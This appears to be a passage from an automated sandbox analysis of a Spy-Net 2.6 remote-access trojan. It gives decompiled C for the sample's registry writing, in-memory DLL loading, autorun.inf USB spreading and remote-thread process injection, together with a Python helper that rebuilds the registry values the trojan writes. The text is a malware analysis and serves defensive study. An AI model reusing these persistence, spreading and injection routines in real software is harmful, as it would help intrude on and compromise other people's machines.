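        return REG_BINARY, bytes(int(tok, 16) for tok in data.split(" ") if tok)
    if type_name == "REG_DWORD":
        # Assumption: E2402ACD0 is a decimal string-to-int; 4 bytes little-endian.
        return REG_DWORD, struct.pack("<I", int(data) & 0xFFFFFFFF)
    if type_name == "REG_MULTI_SZ":
        # Each element NUL-terminated, the list closed by one more NUL.
        parts = data.split(MULTI_SZ_SEPARATOR)
        body = b"".join(p.encode("latin-1") + b"\x00" for p in parts)
        return REG_MULTI_SZ, body + b"\x00"
    raise ValueError(f"unsupported type name {type_name!r}")


def set_value_args(path: str, data: str, type_name: str):
    """Everything the sample would pass on: (root, subkey, name, type, buffer).
    Assumption: an empty type name selects the RegCreateKeyA branch, in which
    case no value is written and type/buffer are None."""
    root, subkey, name = split_value_path(path)
    if type_name == "":
        return root, subkey, name, None, None
    reg_type, buf = encode_value(type_name, data)
    return root, subkey, name, reg_type, buf
```

Seen this way, the value written for a Run entry is just REG_SZ bytes without a terminator, and a REG_BINARY payload is built from the same "XX XX" text form the controller sends, which is useful when reconstructing what a captured command would have placed in the registry.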
                                    Instruction addresses: 0x2402b7d0 onward (per-line address column of the listing above)
                                    0x2402ba6e
                                    0x2402ba6e
                                    0x2402ba6e
                                    0x2402ba79
                                    0x2402ba7e
                                    0x2402bae7
                                    0x2402baef
                                    0x2402baf4
                                    0x2402baf6
                                    0x00000000
                                    0x00000000
                                    0x2402baa2
                                    0x2402baa7
                                    0x2402baaa
                                    0x2402bab2
                                    0x2402bac0
                                    0x2402bac0
                                    0x2402bac7
                                    0x2402bad1
                                    0x2402bad2
                                    0x2402bad7
                                    0x2402bae2
                                    0x2402bae2
                                    0x2402bb00
                                    0x2402bb08
                                    0x2402bb11
                                    0x2402bb28
                                    0x2402bb2f
                                    0x2402bb2f
                                    0x2402bb36
                                    0x2402bb36
                                    0x2402b8a3
                                    0x2402b8ae
                                    0x2402b8bd
                                    0x2402b8d3
                                    0x2402b8e1
                                    0x2402b8e1
                                    0x2402bb41
                                    0x2402bb44
                                    0x2402bb47
                                    0x2402bb54
                                    0x2402bb5c
                                    0x2402bb62
                                    0x2402bb6f
                                    0x2402bb81

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000004,?,?,?,00000000,2402BB82,?,?,00000004,00000000,00000000), ref: 2402B8BD
                                    • RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 2402B8D3
                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,00000000,00000000,00000000,00000004,?,?,?,00000000,2402BB82,?,?,00000004), ref: 2402B8E1
                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000002,?,?,?,00000000,2402BB82,?,?,00000004,00000000,00000000), ref: 2402B905
                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000002,?,?,?,00000000,2402BB82), ref: 2402B944
                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,?,00000000), ref: 2402BA2C
                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000004,?,00000004,00000000,00000000,00000000,00000002,?,?,?,00000000,2402BB82), ref: 2402BA67
                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000007,00000000,00000000,00000000,00000000,00000000,00000002,?,?,?,00000000,2402BB82), ref: 2402BB28
                                    • RegCloseKey.ADVAPI32(?,00000000,00000000,00000000,00000002,?,?,?,00000000,2402BB82,?,?,00000004,00000000,00000000), ref: 2402BB36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Value$CloseOpen$Create
                                    • String ID: REG_BINARY$REG_DWORD$REG_MULTI_SZ$REG_SZ$clave
                                    • API String ID: 2929978649-1504967743
                                    • Opcode ID: 45def6f773d95f33cea0935d5532c0a4a5e441fb0e3b21bbb6b0cc8ae437e8c1
                                    • Instruction ID: 11ea11ba876f2ce4840d79888c876af9f1d1b9398380b42a7f6fc4c234fc24ff
                                    • Opcode Fuzzy Hash: 45def6f773d95f33cea0935d5532c0a4a5e441fb0e3b21bbb6b0cc8ae437e8c1
                                    • Instruction Fuzzy Hash: 03B1DF75A00509AFFF01DBF8C980B9EB7F9BF68608F504065E518F7298DA74EE818B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 78%
                                    			E2402AD24(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                    				char _v8;
                                    				intOrPtr _v12;
                                    				void* _v16;
                                    				int _v20;
                                    				int _v24;
                                    				int _v28;
                                    				int _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				int* _v48;
                                    				intOrPtr _v52;
                                    				char _v56;
                                    				char _v312;
                                    				char _v568;
                                    				char _v824;
                                    				char _v828;
                                    				char _v832;
                                    				char _v836;
                                    				char _v840;
                                    				char _v844;
                                    				void* _t126;
                                    				char* _t130;
                                    				signed int _t170;
                                    				int _t184;
                                    				void* _t187;
                                    				int* _t188;
                                    				intOrPtr _t191;
                                    				char _t192;
                                    				long _t207;
                                    				intOrPtr _t219;
                                    				void* _t223;
                                    				char* _t245;
                                    				char* _t247;
                                    				void* _t250;
                                    				void* _t263;
                                    
                                    				_t263 = __fp0;
                                    				_push(__ebx);
                                    				_v844 = 0;
                                    				_v836 = 0;
                                    				_v840 = 0;
                                    				_v828 = 0;
                                    				_v832 = 0;
                                    				_v36 = 0;
                                    				_v40 = 0;
                                    				_v44 = 0;
                                    				_v12 = __edx;
                                    				_v8 = __eax;
                                    				E24013524(_v8);
                                    				_push(_t250);
                                    				_push(0x2402b104);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t250 + 0xfffffcb8;
                                    				E24013088(_v12);
                                    				_t253 = _v8;
                                    				if(_v8 != 0) {
                                    					_push( &_v16);
                                    					_push(1);
                                    					_push(0);
                                    					_push( &_v828);
                                    					_push(E24013674(0x2402b11c, _v8) + 1);
                                    					_t126 = E2401333C(_v8);
                                    					_pop(_t223);
                                    					E24013590(_v8, _t126, _t223);
                                    					_t130 = E24013534(_v828);
                                    					_t213 = E24013674(0x2402b11c, _v8) - 1;
                                    					E24013590(_v8, E24013674(0x2402b11c, _v8) - 1, 1,  &_v832);
                                    					RegOpenKeyExA(E2402B224(_v832, __ebx, _t253), _t130, ??, ??, ??);
                                    					_v20 = 0;
                                    					_t245 = E24011344(0x3fff);
                                    					_v52 = E24012658(1);
                                    					do {
                                    						RegEnumValueA(_v16, _v20, _t245,  &_v24, 0,  &_v32, 0,  &_v28);
                                    						if(_v28 > 0x3fff) {
                                    							_v28 = 0x3fff;
                                    						}
                                    						_t247 = E24011344(_v28);
                                    						_v24 = 0x3fff;
                                    						_t207 = RegEnumValueA(_v16, _v20, _t245,  &_v24, 0,  &_v32, _t247,  &_v28);
                                    						if(_t207 == 0) {
                                    							E24013088( &_v40);
                                    							if(_v32 != 4) {
                                    								__eflags = _v32 - 3;
                                    								if(_v32 != 3) {
                                    									__eflags = _v32 - 7;
                                    									if(_v32 != 7) {
                                    										E24013274( &_v40, _t247);
                                    									} else {
                                    										_t184 = _v28 - 1;
                                    										__eflags = _t184;
                                    										if(_t184 >= 0) {
                                    											_t187 = _t184 + 1;
                                    											__eflags = _t187;
                                    											_v56 = _t187;
                                    											_v48 = 0;
                                    											do {
                                    												_t188 = _v48;
                                    												__eflags = _t247[_t188];
                                    												if(_t247[_t188] == 0) {
                                    													_t247[_v48] = 0x20;
                                    												}
                                    												_v48 =  &(_v48[0]);
                                    												_t73 =  &_v56;
                                    												 *_t73 = _v56 - 1;
                                    												__eflags =  *_t73;
                                    											} while ( *_t73 != 0);
                                    										}
                                    										E24013274( &_v40, _t247);
                                    									}
                                    								} else {
                                    									__eflags = _v28;
                                    									if(_v28 != 0) {
                                    										_t191 = _v28 - 1;
                                    										__eflags = _t191;
                                    										if(_t191 >= 0) {
                                    											_t192 = _t191 + 1;
                                    											__eflags = _t192;
                                    											_v56 = _t192;
                                    											_v48 = 0;
                                    											do {
                                    												_push(_v40);
                                    												E2402AB84( &_v844, 2);
                                    												_push(_v844);
                                    												_push(0x2402b15c);
                                    												E240133FC();
                                    												_v48 =  &(_v48[0]);
                                    												_t61 =  &_v56;
                                    												 *_t61 = _v56 - 1;
                                    												__eflags =  *_t61;
                                    											} while ( *_t61 != 0);
                                    										}
                                    									} else {
                                    										E24013120( &_v40, "(Empty)");
                                    									}
                                    								}
                                    							} else {
                                    								_push(0x2402b128);
                                    								_push(0);
                                    								E2402AC78(8,  &_v836, _t263,  *_t247);
                                    								_push(_v836);
                                    								_push(0x2402b134);
                                    								E2402ACA8( *_t247,  &_v840);
                                    								_push(_v840);
                                    								_push(0x2402b140);
                                    								E240133FC();
                                    							}
                                    							if( *_t245 != 0) {
                                    								E24013274( &_v44, _t245);
                                    							} else {
                                    								E24013120( &_v44, "(Default)");
                                    							}
                                    							_t170 = _v32;
                                    							if(_t170 <= 7) {
                                    								switch( *((intOrPtr*)(_t170 * 4 +  &M2402AFC8))) {
                                    									case 0:
                                    										__eax =  &_v36;
                                    										__edx = "REG_NONE";
                                    										__eax = E24013120( &_v36, __edx);
                                    										goto L35;
                                    									case 1:
                                    										__eax =  &_v36;
                                    										__edx = "REG_SZ";
                                    										__eax = E24013120( &_v36, __edx);
                                    										goto L35;
                                    									case 2:
                                    										__eax =  &_v36;
                                    										__edx = "REG_EXPAND_SZ";
                                    										__eax = E24013120( &_v36, __edx);
                                    										goto L35;
                                    									case 3:
                                    										E24013120( &_v36, "REG_BINARY");
                                    										goto L35;
                                    									case 4:
                                    										__eax =  &_v36;
                                    										__edx = "REG_DWORD";
                                    										__eax = E24013120( &_v36, __edx);
                                    										goto L35;
                                    									case 5:
                                    										__eax =  &_v36;
                                    										__edx = "REG_DWORD_BIG_ENDIAN";
                                    										__eax = E24013120( &_v36, __edx);
                                    										goto L35;
                                    									case 6:
                                    										__eax =  &_v36;
                                    										__edx = "REG_LINK";
                                    										__eax = E24013120( &_v36, __edx);
                                    										goto L35;
                                    									case 7:
                                    										__eax =  &_v36;
                                    										__edx = "REG_MULTI_SZ";
                                    										__eax = E24013120( &_v36, __edx);
                                    										goto L35;
                                    								}
                                    							}
                                    							L35:
                                    							E24013318( &_v824, 0xff, _v44);
                                    							E24013318( &_v568, 0xff, _v36);
                                    							E24013318( &_v312, 0xff, _v40);
                                    							_t213 = 0x300;
                                    							E24023314(_v52, 0x300,  &_v824);
                                    							_v20 = _v20 + 1;
                                    						}
                                    					} while (_t207 == 0);
                                    					RegCloseKey(_v16);
                                    					E24023024(_v52, _t213, _v12);
                                    					E24012688(_v52);
                                    				}
                                    				_pop(_t219);
                                    				 *[fs:eax] = _t219;
                                    				_push(0x2402b10b);
                                    				E240130AC( &_v844, 5);
                                    				E240130AC( &_v44, 3);
                                    				return E24013088( &_v8);
                                    			}

                                    Instruction address column for E2402AD24 (0x2402ad24 through 0x2402b103); the disassembly text for these addresses was not captured in this extract.

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,?,00000000,00000001,?,00000000,2402B104), ref: 2402ADF4
                                    • RegEnumValueA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,00000001,?,00000000), ref: 2402AE34
                                    • RegEnumValueA.ADVAPI32(?,?,00000000,00003FFF,00000000,?,00000000,00003FFF,?,?,00000000,?,00000000,?,00000000,?), ref: 2402AE72
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: EnumValue$Open
                                    • String ID: (Default)$(Empty)$REG_BINARY$REG_DWORD$REG_DWORD_BIG_ENDIAN$REG_EXPAND_SZ$REG_LINK$REG_MULTI_SZ$REG_NONE$REG_SZ
                                    • API String ID: 1214633557-2843546354
                                    • Opcode ID: 25a180eefb73874bb5c49ad9faa0ce83b91ba38d871c07ba4ed221fb77b46527
                                    • Instruction ID: 826a2c8ad50f91c2a923b36951061371a61d3372b588d25ccef054f8f5192549
                                    • Opcode Fuzzy Hash: 25a180eefb73874bb5c49ad9faa0ce83b91ba38d871c07ba4ed221fb77b46527
                                    • Instruction Fuzzy Hash: 9CB1F970A046199FEF51DFA5C880AEEB7F9BF58304F5040A5E508B7288DB74ABC58F61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 80%
                                    			E24023DDC(void* __fp0, intOrPtr* _a4) {
                                    				intOrPtr _v8;
                                    				void* _v12;
                                    				intOrPtr _v16;
                                    				short _v76;
                                    				long _v240;
                                    				long _v244;
                                    				void* _v272;
                                    				char _v324;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				intOrPtr _t63;
                                    				void* _t69;
                                    				void* _t76;
                                    				void* _t80;
                                    				void* _t102;
                                    				intOrPtr _t123;
                                    				void* _t125;
                                    				intOrPtr _t130;
                                    				intOrPtr _t132;
                                    				intOrPtr _t134;
                                    				void* _t135;
                                    				void* _t136;
                                    				void* _t138;
                                    				intOrPtr _t140;
                                    				void* _t142;
                                    
                                    				_t142 = __fp0;
                                    				_t137 = _a4;
                                    				_v12 = 0;
                                    				_v8 = 0;
                                    				_push(0x24023fe8);
                                    				_push( *[fs:ecx]);
                                    				 *[fs:ecx] = _t140;
                                    				E24015460( &_v76,  *_a4);
                                    				if(_v76 == 0x5a4d) {
                                    					E24015460( &_v324,  *_t137 + _v16);
                                    					__eflags = _v324 - 0x4550;
                                    					if(_v324 == 0x4550) {
                                    						_t102 = VirtualAlloc(_v272, _v244, 0x2000, 0x40);
                                    						__eflags = _t102;
                                    						if(_t102 == 0) {
                                    							_t102 = VirtualAlloc(0, _v244, 0x2000, 0x40);
                                    						}
                                    						__eflags = _t102;
                                    						if(__eflags != 0) {
                                    							_v12 = RtlAllocateHeap(GetProcessHeap(), 0, 0x11);
                                    							 *(_v12 + 4) = _t102;
                                    							 *((intOrPtr*)(_v12 + 0xc)) = 0;
                                    							 *((intOrPtr*)(_v12 + 8)) = 0;
                                    							 *((char*)(_v12 + 0x10)) = 0;
                                    							VirtualAlloc(_t102, _v244, 0x1000, 0x40);
                                    							_t135 = VirtualAlloc(_t102, _v240, 0x1000, 0x40);
                                    							E24015460(_t135,  *_t137);
                                    							_t63 = _t135 + _v16;
                                    							 *_v12 = _t63;
                                    							_t136 = _t102;
                                    							 *(_t63 + 0x34) = _t136;
                                    							E2402388C(__eflags,  *_t137,  &_v324, _v12);
                                    							_t69 = _t136 - _v272;
                                    							__eflags = _t69;
                                    							if(_t69 != 0) {
                                    								E24023930(_t142, _v12, _t69);
                                    							}
                                    							__eflags = E24023A08(_t102, _t136, _t137, _v12);
                                    							if(__eflags == 0) {
                                    								E24013344(0x2405bb68, " BTMemoryLoadLibary: BuildImportTable failed");
                                    							}
                                    							E24023CEC(__eflags, _v12);
                                    							_t76 =  *( *_v12 + 0x28);
                                    							__eflags = _t76;
                                    							if(_t76 != 0) {
                                    								_t125 = _t76 + _t136;
                                    								_t138 = _t125;
                                    								__eflags = _t125;
                                    								if(_t125 == 0) {
                                    									E240130DC(0x2405bb68, "BTMemoryLoadLibary: Get DLLEntyPoint failed");
                                    								}
                                    								_t80 =  *_t138(_t136, 1, 0);
                                    								__eflags = _t80 - 1;
                                    								asm("sbb eax, eax");
                                    								__eflags = _t80 + 1;
                                    								if(_t80 + 1 == 0) {
                                    									E240130DC(0x2405bb68, "BTMemoryLoadLibary: Can\'t attach library");
                                    								}
                                    								 *((char*)(_v12 + 0x10)) = 1;
                                    							}
                                    							_pop(_t123);
                                    							 *[fs:eax] = _t123;
                                    							_v8 = _v12;
                                    						} else {
                                    							E240130DC(0x2405bb68, "BTMemoryLoadLibary: VirtualAlloc failed");
                                    							_pop(_t130);
                                    							 *[fs:eax] = _t130;
                                    						}
                                    					} else {
                                    						E240130DC(0x2405bb68, "BTMemoryLoadLibary: IMAGE_NT_SIGNATURE is not valid");
                                    						_pop(_t132);
                                    						 *[fs:eax] = _t132;
                                    					}
                                    				} else {
                                    					E240130DC(0x2405bb68, "BTMemoryLoadLibary: dll dos header is not valid");
                                    					_pop(_t134);
                                    					 *[fs:eax] = _t134;
                                    				}
                                    				return _v8;
                                    			}
                                    Instruction addresses (address column of the listing, 0x24023ddc to 0x24024011)

                                    Strings
                                    • PE, xrefs: 24023E4B
                                    • BTMemoryLoadLibary: Get DLLEntyPoint failed, xrefs: 24023FAD
                                    • BTMemoryLoadLibary: Can't attach library, xrefs: 24023FCD
                                    • MZ, xrefs: 24023E12
                                    • BTMemoryLoadLibary: VirtualAlloc failed, xrefs: 24023EB3
                                    • BTMemoryLoadLibary: dll dos header is not valid, xrefs: 24023E1F
                                    • BTMemoryLoadLibary: IMAGE_NT_SIGNATURE is not valid, xrefs: 24023E5C
                                    • BTMemoryLoadLibary: BuildImportTable failed, xrefs: 24023F7F
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: BTMemoryLoadLibary: BuildImportTable failed$BTMemoryLoadLibary: Can't attach library$BTMemoryLoadLibary: Get DLLEntyPoint failed$BTMemoryLoadLibary: IMAGE_NT_SIGNATURE is not valid$BTMemoryLoadLibary: VirtualAlloc failed$BTMemoryLoadLibary: dll dos header is not valid$MZ$PE
                                    • API String ID: 0-3631919656
                                    • Opcode ID: a3fdd24fea7cd128e3e7310029a0cf7e4744ff52a95439504260f722dcc45f91
                                    • Instruction ID: 5638aa09819caaf77772874261cd78290d7563892cf8c3a7d6ccfdc165388388
                                    • Opcode Fuzzy Hash: a3fdd24fea7cd128e3e7310029a0cf7e4744ff52a95439504260f722dcc45f91
                                    • Instruction Fuzzy Hash: CB516271B04604AFEB11CFA9C890F9DB7F9FF58718F1084A5E608EB295D6B0D9C18B54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 43%
                                    			E24055928(void* __ebx, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				char _v56;
                                    				void* __ecx;
                                    				CHAR* _t50;
                                    				intOrPtr* _t87;
                                    				intOrPtr _t89;
                                    				void* _t94;
                                    				intOrPtr _t113;
                                    				intOrPtr _t117;
                                    				intOrPtr _t118;
                                    
                                    				_t115 = __esi;
                                    				_t117 = _t118;
                                    				_t89 = 6;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t89 = _t89 - 1;
                                    					_t119 = _t89;
                                    				} while (_t89 != 0);
                                    				_t1 =  &_v8;
                                    				 *_t1 = _t89;
                                    				_v8 =  *_t1;
                                    				E24013524(_v8);
                                    				_t87 =  *0x2405ac24; // 0x2405b980
                                    				_push(_t117);
                                    				_push(0x24055ac4);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t118;
                                    				E24013388( &_v12, "RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\", _v8);
                                    				E24017450(_v12, _t87, _t119);
                                    				E24015878( *_t87, "RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\",  &_v24);
                                    				_t92 = _v24;
                                    				E24013388( &_v20, _v24, _v12);
                                    				_t50 = E24013534(_v20);
                                    				CopyFileA(E24013534( *_t87), _t50, 0);
                                    				_push("[autorun]\r\n;open=RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
                                    				E24015878( *_t87, _v24,  &_v28);
                                    				_push(_v28);
                                    				_push(0x24055b6c);
                                    				_push("icon=shell32.dll,4");
                                    				_push(0x24055b6c);
                                    				_push("shellexecute=");
                                    				_push("RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
                                    				E24015878( *_t87, _v24,  &_v32);
                                    				_push(_v32);
                                    				_push(0x24055b6c);
                                    				_push("label=PENDRIVE");
                                    				_push(0x24055b6c);
                                    				_push("action=Open folder to view files");
                                    				_push(0x24055b6c);
                                    				_push("shell\\Open=Open");
                                    				_push(0x24055b6c);
                                    				_push("shell\\Open\\command=");
                                    				_push("RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
                                    				E24015878( *_t87, _t92,  &_v36);
                                    				_push(_v36);
                                    				_push(0x24055b6c);
                                    				_push("shell\\Open\\Default=1");
                                    				E240133FC();
                                    				_push(E2401333C(_v16));
                                    				E24013388( &_v40, "autorun.inf", _v8);
                                    				_pop(_t94);
                                    				E24016DA0(_v40, _t87, _t94, _v16, __esi, _t119);
                                    				E24013388( &_v44, "autorun.inf", _v8);
                                    				E24017728(_v44, _t87, __esi, _t119);
                                    				E24013388( &_v48, "RECYCLER\\", _v8);
                                    				E24017728(_v48, _t87, __esi, _t119);
                                    				E24017728(_v12, _t87, _t115, _t119);
                                    				E24015878( *_t87, "RECYCLER\\",  &_v56);
                                    				E24013388( &_v52, _v56, _v12);
                                    				E24017728(_v52, _t87, _t115, _t119);
                                    				_pop(_t113);
                                    				 *[fs:eax] = _t113;
                                    				_push(0x24055acb);
                                    				return E240130AC( &_v56, 0xd);
                                    			}
                                    Instruction addresses (address column of the listing, 0x24055928 to 0x24055ac3)

                                    APIs
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 2405599E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CopyFile
                                    • String ID: RECYCLER\$RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\$[autorun];open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\$action=Open folder to view files$autorun.inf$icon=shell32.dll,4$label=PENDRIVE$shell\Open=Open$shell\Open\Default=1$shell\Open\command=$shellexecute=
                                    • API String ID: 1304948518-631342129
                                    • Opcode ID: 347498723349dc8d2e585895e3b3ff9e5180e6509c53eca6c6437bff1f64b86d
                                    • Instruction ID: bfebc3fbeaf63f4b613aede6aa2103807c4c132b5100591409c8784ac4b4035c
                                    • Opcode Fuzzy Hash: 347498723349dc8d2e585895e3b3ff9e5180e6509c53eca6c6437bff1f64b86d
                                    • Instruction Fuzzy Hash: D041CA34A10109EBEF00EBA5D8D0E9EBBB5FF59204F6045A4F405BB26CDB74AE858F54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E2405412C(void* __eax, void* __ecx, void* __edx, void* __eflags) {
                                    				intOrPtr _v20;
                                    				long _v24;
                                    				_Unknown_base(*)()* _v28;
                                    				_Unknown_base(*)()* _v32;
                                    				char _v36;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				void* _t23;
                                    				void* _t24;
                                    				void* _t31;
                                    				long _t32;
                                    				void* _t33;
                                    				DWORD* _t34;
                                    
                                    				_t25 = __ecx;
                                    				_t34 =  &_v24;
                                    				_t33 = __ecx;
                                    				_t31 = __edx;
                                    				_t23 = __eax;
                                    				_t32 = 0;
                                    				_v28 = GetProcAddress(GetModuleHandleA("kernel32"), "GetModuleHandleA");
                                    				_v32 = GetProcAddress(GetModuleHandleA("kernel32"), "GetProcAddress");
                                    				_v36 = GetProcAddress(GetModuleHandleA("kernel32"), "ExitThread");
                                    				_v20 = E24053EC0(_t23, _t23, _t25, _t33, _t31, 0);
                                    				_v24 = E24053EC0(_t23, _t23, _t25, _t31, _t31, 0);
                                    				_t24 = E24053F80(_t23,  &_v36, E240540FC, 0, 0x14);
                                    				if(_t24 != 0) {
                                    					WaitForSingleObject(_t24, 0xffffffff);
                                    					GetExitCodeThread(_t24, _t34);
                                    					_t32 =  *_t34;
                                    				}
                                    				return _t32;
                                    			}
                                    Instruction addresses (address column of the listing, 0x2405412c to 0x240541d5)

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32,GetModuleHandleA), ref: 24054145
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 2405414B
                                    • GetModuleHandleA.KERNEL32(kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 2405415E
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 24054164
                                    • GetModuleHandleA.KERNEL32(kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 24054177
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 2405417D
                                      • Part of subcall function 24053EC0: VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,24053F3E,?,?,?,?,00000000,00000000,00000000), ref: 24053EFC
                                      • Part of subcall function 24053EC0: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,24053F3E), ref: 24053F1E
                                      • Part of subcall function 24053F80: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 24053FBE
                                      • Part of subcall function 24053F80: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,00000000,00000000,00000000,00000000,?), ref: 24053FCE
                                      • Part of subcall function 24053F80: ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF,?,00000000,00000000,00000000,00000000,00000000,?), ref: 24053FE1
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 240541BD
                                    • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 240541C4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc$MemoryObjectProcessSingleThreadWait$AllocCodeCreateExitReadRemoteVirtualWrite
                                    • String ID: ExitThread$GetModuleHandleA$GetProcAddress$kernel32
                                    • API String ID: 3826234517-3123223305
                                    • Opcode ID: 857c26d249c059f29954a6ea8bfb13d4ce4fff632f161b6b0166d8a80e2c55ef
                                    • Instruction ID: 501ea7a37b6bf7497f67c2f653f5f044889ffa826b872c0320aaaf75650d9bce
                                    • Opcode Fuzzy Hash: 857c26d249c059f29954a6ea8bfb13d4ce4fff632f161b6b0166d8a80e2c55ef
                                    • Instruction Fuzzy Hash: F001C470A0431037E300AFBA4C90B5F7A9CEFA1168F904928B518BB2A9D930DE8447A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 41%
                                    			E24022638(char __eax, void* __ebx, void* __esi) {
                                    				char _v8;
                                    				long _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char* _t32;
                                    				long _t62;
                                    				void* _t69;
                                    				void* _t72;
                                    				void* _t73;
                                    				intOrPtr _t76;
                                    				intOrPtr _t83;
                                    				intOrPtr _t84;
                                    
                                    				_t71 = __ebx;
                                    				_t83 = _t84;
                                    				_t73 = 5;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t73 = _t73 - 1;
                                    				} while (_t73 != 0);
                                    				_push(__ebx);
                                    				_v8 = __eax;
                                    				E24013524(_v8);
                                    				_push(_t83);
                                    				_push(0x240227c7);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t84;
                                    				_t32 =  *0x2405abb4; // 0x2405b880
                                    				_t86 =  *_t32;
                                    				if( *_t32 != 0) {
                                    					E2401673C("Desktop", __ebx,  &_v20, __esi, _t86);
                                    					_push(_v20);
                                    					_push(0x240227ec);
                                    					_push("Spy-Net ");
                                    					_push("2.6");
                                    					_push(".txt");
                                    					E240133FC();
                                    					if(E24016C78(_v16, _t71, _t86) == 0) {
                                    						_t69 = CreateFileA(E24013534(_v16), 0x40000000, 2, 0, 2, 0, 0);
                                    						_t71 = _t69;
                                    						CloseHandle(_t69);
                                    					}
                                    					E24016BD0( &_v24, _t71, _t73);
                                    					_push(_v24);
                                    					_push(0x24022828);
                                    					E24016B28( &_v28, _t71, _t73);
                                    					_push(_v28);
                                    					_push(0x24022828);
                                    					E24016B08( &_v32);
                                    					_push(_v32);
                                    					_push(" --- ");
                                    					E24016910( &_v36, _t71, _t73);
                                    					_push(_v36);
                                    					_push(0x24022844);
                                    					E240169B8( &_v40, _t71, _t73);
                                    					_push(_v40);
                                    					_push(0x24022844);
                                    					E24016A60( &_v44, _t71, _t73);
